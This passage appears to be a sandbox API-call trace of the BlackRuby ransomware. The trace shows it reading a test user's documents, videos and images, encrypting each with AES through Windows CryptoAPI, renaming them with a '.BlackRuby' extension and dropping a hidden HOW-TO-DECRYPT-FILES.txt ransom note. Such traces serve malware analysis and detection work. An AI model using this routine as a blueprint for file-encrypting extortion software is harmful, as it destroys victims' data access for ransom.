nFileSizeLow=0x1a88)) returned 1 [0056.685] GetLastError () returned 0x12 [0056.685] SetErrorMode (uMode=0x0) returned 0x1 [0056.686] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\J4xhonY_.docx", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\J4xhonY_.docx", lpFilePart=0x0) returned 0x36 [0056.686] GetLastError () returned 0x12 [0056.686] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\J4xhonY_.docx", nBufferLength=0x105, lpBuffer=0x18e750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\J4xhonY_.docx", lpFilePart=0x0) returned 0x36 [0056.686] GetLastError () returned 0x12 [0056.686] SetErrorMode (uMode=0x1) returned 0x0 [0056.686] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\J4xhonY_.docx" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\lxs\\j4xhony_.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.686] GetLastError () returned 0x0 [0056.686] GetFileType (hFile=0x184) returned 0x1 [0056.686] SetErrorMode (uMode=0x0) returned 0x1 [0056.686] GetFileType (hFile=0x184) returned 0x1 [0056.686] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed04 | out: lpFileSizeHigh=0x18ed04*=0x0) returned 0x1a88 [0056.686] GetLastError () returned 0x0 [0056.686] ReadFile (in: hFile=0x184, lpBuffer=0x1b59850, nNumberOfBytesToRead=0x1a88, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x1b59850*, lpNumberOfBytesRead=0x18ecac*=0x1a88, lpOverlapped=0x0) returned 1 [0056.687] GetLastError () returned 0x0 [0056.687] CloseHandle (hObject=0x184) returned 1 [0056.687] GetLastError () returned 0x0 [0056.687] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\J4xhonY_.docx", nBufferLength=0x105, lpBuffer=0x18e860, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\J4xhonY_.docx", lpFilePart=0x0) returned 0x36 [0056.687] GetLastError () returned 0x0 [0056.687] SetErrorMode (uMode=0x1) returned 0x0 [0056.687] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\J4xhonY_.docx" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\lxs\\j4xhony_.docx"), fInfoLevelId=0x0, lpFileInformation=0x18ed14 | out: lpFileInformation=0x18ed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40b12c00, ftCreationTime.dwHighDateTime=0x1d35913, ftLastAccessTime.dwLowDateTime=0xb8f5fab0, ftLastAccessTime.dwHighDateTime=0x1d34bad, ftLastWriteTime.dwLowDateTime=0xb8f5fab0, ftLastWriteTime.dwHighDateTime=0x1d34bad, nFileSizeHigh=0x0, nFileSizeLow=0x1a88)) returned 1 [0056.687] GetLastError () returned 0x0 [0056.687] SetErrorMode (uMode=0x0) returned 0x1 [0056.687] CryptAcquireContextW (in: phProv=0x18ec74, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ec74*=0x37c680) returned 1 [0056.688] GetLastError () returned 0x0 [0056.730] CryptImportKey (in: hProv=0x37c680, pbData=0x1bb7120, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360c20) returned 1 [0056.730] GetLastError () returned 0x0 [0056.730] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.730] GetLastError () returned 0x0 [0056.736] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.736] GetLastError () returned 0x0 [0056.736] CryptDuplicateKey (in: hKey=0x360c20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x360f60) returned 1 [0056.736] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.736] GetLastError () returned 0x0 [0056.736] CryptSetKeyParam (hKey=0x360f60, dwParam=0x4, pbData=0x1be416c*=0x1, dwFlags=0x0) returned 1 [0056.736] GetLastError () returned 0x0 [0056.736] CryptSetKeyParam (hKey=0x360f60, dwParam=0x1, pbData=0x1be4138, dwFlags=0x0) returned 1 [0056.736] GetLastError () returned 0x0 [0056.736] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1be41b4*, pdwDataLen=0x18ec9c*=0x1b80, dwBufLen=0x1b80 | out: pbData=0x1be41b4*, pdwDataLen=0x18ec9c*=0x1b80) returned 1 [0056.736] GetLastError () returned 0x0 [0056.736] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1be78e0*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1be78e0*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0056.736] GetLastError () returned 0x0 [0056.736] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1be7910*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1be7910*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0056.736] GetLastError () returned 0x0 [0056.736] CryptDestroyKey (hKey=0x360c20) returned 1 [0056.736] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0056.736] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0056.736] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\J4xhonY_.docx", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\J4xhonY_.docx", lpFilePart=0x0) returned 0x36 [0056.736] GetLastError () returned 0x0 [0056.736] SetErrorMode (uMode=0x1) returned 0x0 [0056.736] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\J4xhonY_.docx" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\lxs\\j4xhony_.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.737] GetLastError () returned 0xb7 [0056.737] GetFileType (hFile=0x184) returned 0x1 [0056.737] SetErrorMode (uMode=0x0) returned 0x1 [0056.737] GetFileType (hFile=0x184) returned 0x1 [0056.738] CloseHandle (hObject=0x184) returned 1 [0056.738] GetLastError () returned 0xb7 [0056.738] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\J4xhonY_.docx", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\J4xhonY_.docx", lpFilePart=0x0) returned 0x36 [0056.738] GetLastError () returned 0xb7 [0056.738] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\Encrypted_ojAoqZzDHK76JzwSzIg4j1TCbt9few5XhBfajeNNTH.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\Encrypted_ojAoqZzDHK76JzwSzIg4j1TCbt9few5XhBfajeNNTH.BlackRuby", lpFilePart=0x0) returned 0x67 [0056.738] GetLastError () returned 0xb7 [0056.738] SetErrorMode (uMode=0x1) returned 0x0 [0056.738] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\J4xhonY_.docx" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\lxs\\j4xhony_.docx"), fInfoLevelId=0x0, lpFileInformation=0x18ecfc | out: lpFileInformation=0x18ecfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40b12c00, ftCreationTime.dwHighDateTime=0x1d35913, ftLastAccessTime.dwLowDateTime=0xb8f5fab0, ftLastAccessTime.dwHighDateTime=0x1d34bad, ftLastWriteTime.dwLowDateTime=0x2a0238e0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x1b90)) returned 1 [0056.738] GetLastError () returned 0xb7 [0056.738] SetErrorMode (uMode=0x0) returned 0x1 [0056.738] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\J4xhonY_.docx" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\lxs\\j4xhony_.docx"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\Encrypted_ojAoqZzDHK76JzwSzIg4j1TCbt9few5XhBfajeNNTH.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\lxs\\encrypted_ojaoqzzdhk76jzwszig4j1tcbt9few5xhbfajennth.blackruby")) returned 1 [0056.739] GetLastError () returned 0xb7 [0056.739] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e760, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x41 [0056.739] GetLastError () returned 0xb7 [0056.739] SetErrorMode (uMode=0x1) returned 0x0 [0056.739] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\lxs\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.739] GetLastError () returned 0x0 [0056.739] GetFileType (hFile=0x184) returned 0x1 [0056.739] SetErrorMode (uMode=0x0) returned 0x1 [0056.739] GetFileType (hFile=0x184) returned 0x1 [0056.740] CloseHandle (hObject=0x184) returned 1 [0056.741] GetLastError () returned 0x0 [0056.741] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e888, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x41 [0056.741] GetLastError () returned 0x0 [0056.741] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0056.741] GetLastError () returned 0x0 [0056.741] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\oP8w3QDf61Fwio.mp4", nBufferLength=0x105, lpBuffer=0x18e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\oP8w3QDf61Fwio.mp4", lpFilePart=0x0) returned 0x3b [0056.741] GetLastError () returned 0x0 [0056.741] SetErrorMode (uMode=0x1) returned 0x0 [0056.741] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\oP8w3QDf61Fwio.mp4" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\lxs\\op8w3qdf61fwio.mp4"), fInfoLevelId=0x0, lpFileInformation=0x1c09a34 | out: lpFileInformation=0x1c09a34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b0be760, ftCreationTime.dwHighDateTime=0x1d34f6e, ftLastAccessTime.dwLowDateTime=0xf6f845b0, ftLastAccessTime.dwHighDateTime=0x1d3527a, ftLastWriteTime.dwLowDateTime=0xf6f845b0, ftLastWriteTime.dwHighDateTime=0x1d3527a, nFileSizeHigh=0x0, nFileSizeLow=0xe54b)) returned 1 [0056.741] GetLastError () returned 0x0 [0056.741] SetErrorMode (uMode=0x0) returned 0x1 [0056.741] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\oP8w3QDf61Fwio.mp4", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\oP8w3QDf61Fwio.mp4", lpFilePart=0x0) returned 0x3b [0056.741] GetLastError () returned 0x0 [0056.741] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\oP8w3QDf61Fwio.mp4", nBufferLength=0x105, lpBuffer=0x18e750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\oP8w3QDf61Fwio.mp4", lpFilePart=0x0) returned 0x3b [0056.741] GetLastError () returned 0x0 [0056.741] SetErrorMode (uMode=0x1) returned 0x0 [0056.741] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\oP8w3QDf61Fwio.mp4" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\lxs\\op8w3qdf61fwio.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.741] GetLastError () returned 0x0 [0056.741] GetFileType (hFile=0x184) returned 0x1 [0056.741] SetErrorMode (uMode=0x0) returned 0x1 [0056.742] GetFileType (hFile=0x184) returned 0x1 [0056.742] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed04 | out: lpFileSizeHigh=0x18ed04*=0x0) returned 0xe54b [0056.742] GetLastError () returned 0x0 [0056.742] ReadFile (in: hFile=0x184, lpBuffer=0x1c0ba98, nNumberOfBytesToRead=0xe54b, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x1c0ba98*, lpNumberOfBytesRead=0x18ecac*=0xe54b, lpOverlapped=0x0) returned 1 [0056.742] GetLastError () returned 0x0 [0056.743] CloseHandle (hObject=0x184) returned 1 [0056.743] GetLastError () returned 0x0 [0056.743] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\oP8w3QDf61Fwio.mp4", nBufferLength=0x105, lpBuffer=0x18e860, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\oP8w3QDf61Fwio.mp4", lpFilePart=0x0) returned 0x3b [0056.743] GetLastError () returned 0x0 [0056.743] SetErrorMode (uMode=0x1) returned 0x0 [0056.743] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\oP8w3QDf61Fwio.mp4" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\lxs\\op8w3qdf61fwio.mp4"), fInfoLevelId=0x0, lpFileInformation=0x18ed14 | out: lpFileInformation=0x18ed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b0be760, ftCreationTime.dwHighDateTime=0x1d34f6e, ftLastAccessTime.dwLowDateTime=0xf6f845b0, ftLastAccessTime.dwHighDateTime=0x1d3527a, ftLastWriteTime.dwLowDateTime=0xf6f845b0, ftLastWriteTime.dwHighDateTime=0x1d3527a, nFileSizeHigh=0x0, nFileSizeLow=0xe54b)) returned 1 [0056.743] GetLastError () returned 0x0 [0056.743] SetErrorMode (uMode=0x0) returned 0x1 [0056.753] CryptImportKey (in: hProv=0x37c708, pbData=0x1c82904, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x3609e0) returned 1 [0056.753] GetLastError () returned 0x0 [0056.754] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.754] GetLastError () returned 0x0 [0056.759] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.759] GetLastError () returned 0x0 [0056.759] CryptDuplicateKey (in: hKey=0x3609e0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x360ee0) returned 1 [0056.759] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.759] GetLastError () returned 0x0 [0056.759] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x4, pbData=0x1caf950*=0x1, dwFlags=0x0) returned 1 [0056.759] GetLastError () returned 0x0 [0056.759] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x1, pbData=0x1caf91c, dwFlags=0x0) returned 1 [0056.759] GetLastError () returned 0x0 [0056.759] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1caf998*, pdwDataLen=0x18ec9c*=0xe640, dwBufLen=0xe640 | out: pbData=0x1caf998*, pdwDataLen=0x18ec9c*=0xe640) returned 1 [0056.760] GetLastError () returned 0x0 [0056.760] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1ccc644*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1ccc644*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0056.760] GetLastError () returned 0x0 [0056.760] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1ccc674*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1ccc674*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0056.760] GetLastError () returned 0x0 [0056.760] CryptDestroyKey (hKey=0x3609e0) returned 1 [0056.760] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0056.760] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0056.760] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\oP8w3QDf61Fwio.mp4", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\oP8w3QDf61Fwio.mp4", lpFilePart=0x0) returned 0x3b [0056.760] GetLastError () returned 0x0 [0056.760] SetErrorMode (uMode=0x1) returned 0x0 [0056.762] GetFileType (hFile=0x184) returned 0x1 [0056.762] GetFileType (hFile=0x184) returned 0x1 [0056.763] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\oP8w3QDf61Fwio.mp4" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\lxs\\op8w3qdf61fwio.mp4"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\Encrypted_15Po2M6t91ViZOfWRyhIwT9HTCXmapOTFpMxyHaygk8ulMI.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\lxs\\encrypted_15po2m6t91vizofwryhiwt9htcxmapotfpmxyhaygk8ulmi.blackruby")) returned 1 [0056.764] GetLastError () returned 0xb7 [0056.765] SetErrorMode (uMode=0x0) returned 0x1 [0056.765] GetFileType (hFile=0x184) returned 0x1 [0056.765] GetFileType (hFile=0x184) returned 0x1 [0056.765] ReadFile (in: hFile=0x184, lpBuffer=0x1cf9c88, nNumberOfBytesToRead=0x471b, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x1cf9c88*, lpNumberOfBytesRead=0x18ecac*=0x471b, lpOverlapped=0x0) returned 1 [0056.766] GetLastError () returned 0x0 [0056.805] CryptImportKey (in: hProv=0x37c790, pbData=0x1b5eabc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360c20) returned 1 [0056.805] GetLastError () returned 0x0 [0056.805] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.805] GetLastError () returned 0x0 [0056.810] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.810] GetLastError () returned 0x0 [0056.810] CryptDuplicateKey (in: hKey=0x360c20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x360b60) returned 1 [0056.810] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.810] GetLastError () returned 0x0 [0056.810] CryptSetKeyParam (hKey=0x360b60, dwParam=0x4, pbData=0x1b8bb08*=0x1, dwFlags=0x0) returned 1 [0056.810] GetLastError () returned 0x0 [0056.810] CryptSetKeyParam (hKey=0x360b60, dwParam=0x1, pbData=0x1b8bad4, dwFlags=0x0) returned 1 [0056.810] GetLastError () returned 0x0 [0056.810] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b8bb50*, pdwDataLen=0x18ec9c*=0x4810, dwBufLen=0x4810 | out: pbData=0x1b8bb50*, pdwDataLen=0x18ec9c*=0x4810) returned 1 [0056.810] GetLastError () returned 0x0 [0056.810] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b94b9c*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1b94b9c*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0056.810] GetLastError () returned 0x0 [0056.811] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b94bcc*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1b94bcc*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0056.811] GetLastError () returned 0x0 [0056.811] CryptDestroyKey (hKey=0x360c20) returned 1 [0056.811] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0056.811] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0056.811] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\ucc7_EgeJhq.png", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\ucc7_EgeJhq.png", lpFilePart=0x0) returned 0x38 [0056.811] GetLastError () returned 0x0 [0056.811] SetErrorMode (uMode=0x1) returned 0x0 [0056.811] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\ucc7_EgeJhq.png" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\lxs\\ucc7_egejhq.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.812] GetLastError () returned 0xb7 [0056.812] GetFileType (hFile=0x184) returned 0x1 [0056.812] SetErrorMode (uMode=0x0) returned 0x1 [0056.812] GetFileType (hFile=0x184) returned 0x1 [0056.813] CloseHandle (hObject=0x184) returned 1 [0056.813] GetLastError () returned 0xb7 [0056.813] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\ucc7_EgeJhq.png", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\ucc7_EgeJhq.png", lpFilePart=0x0) returned 0x38 [0056.813] GetLastError () returned 0xb7 [0056.813] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\Encrypted_hFo31W8r3nzitaeFMPtPsBiqlxSCTkcueQ4Ct2f.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\Encrypted_hFo31W8r3nzitaeFMPtPsBiqlxSCTkcueQ4Ct2f.BlackRuby", lpFilePart=0x0) returned 0x64 [0056.813] GetLastError () returned 0xb7 [0056.813] SetErrorMode (uMode=0x1) returned 0x0 [0056.813] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\ucc7_EgeJhq.png" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\lxs\\ucc7_egejhq.png"), fInfoLevelId=0x0, lpFileInformation=0x18ecfc | out: lpFileInformation=0x18ecfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a390e50, ftCreationTime.dwHighDateTime=0x1d350cb, ftLastAccessTime.dwLowDateTime=0x8b802ff0, ftLastAccessTime.dwHighDateTime=0x1d357d9, ftLastWriteTime.dwLowDateTime=0x2a0e1fc0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x4820)) returned 1 [0056.813] GetLastError () returned 0xb7 [0056.813] SetErrorMode (uMode=0x0) returned 0x1 [0056.813] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\ucc7_EgeJhq.png" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\lxs\\ucc7_egejhq.png"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\Encrypted_hFo31W8r3nzitaeFMPtPsBiqlxSCTkcueQ4Ct2f.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\lxs\\encrypted_hfo31w8r3nzitaefmptpsbiqlxsctkcueq4ct2f.blackruby")) returned 1 [0056.813] GetLastError () returned 0xb7 [0056.814] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e760, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x41 [0056.814] GetLastError () returned 0xb7 [0056.814] SetErrorMode (uMode=0x1) returned 0x0 [0056.814] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\lxs\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0056.814] GetLastError () returned 0x5 [0056.815] SetErrorMode (uMode=0x0) returned 0x1 [0056.815] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\W7XG7.mp4", nBufferLength=0x105, lpBuffer=0x18e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\W7XG7.mp4", lpFilePart=0x0) returned 0x32 [0056.815] GetLastError () returned 0x5 [0056.815] SetErrorMode (uMode=0x1) returned 0x0 [0056.815] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\W7XG7.mp4" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\lxs\\w7xg7.mp4"), fInfoLevelId=0x0, lpFileInformation=0x1bbf770 | out: lpFileInformation=0x1bbf770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc46d4cd0, ftCreationTime.dwHighDateTime=0x1d35a4f, ftLastAccessTime.dwLowDateTime=0x40e51d80, ftLastAccessTime.dwHighDateTime=0x1d35071, ftLastWriteTime.dwLowDateTime=0x40e51d80, ftLastWriteTime.dwHighDateTime=0x1d35071, nFileSizeHigh=0x0, nFileSizeLow=0x9748)) returned 1 [0056.815] GetLastError () returned 0x5 [0056.815] SetErrorMode (uMode=0x0) returned 0x1 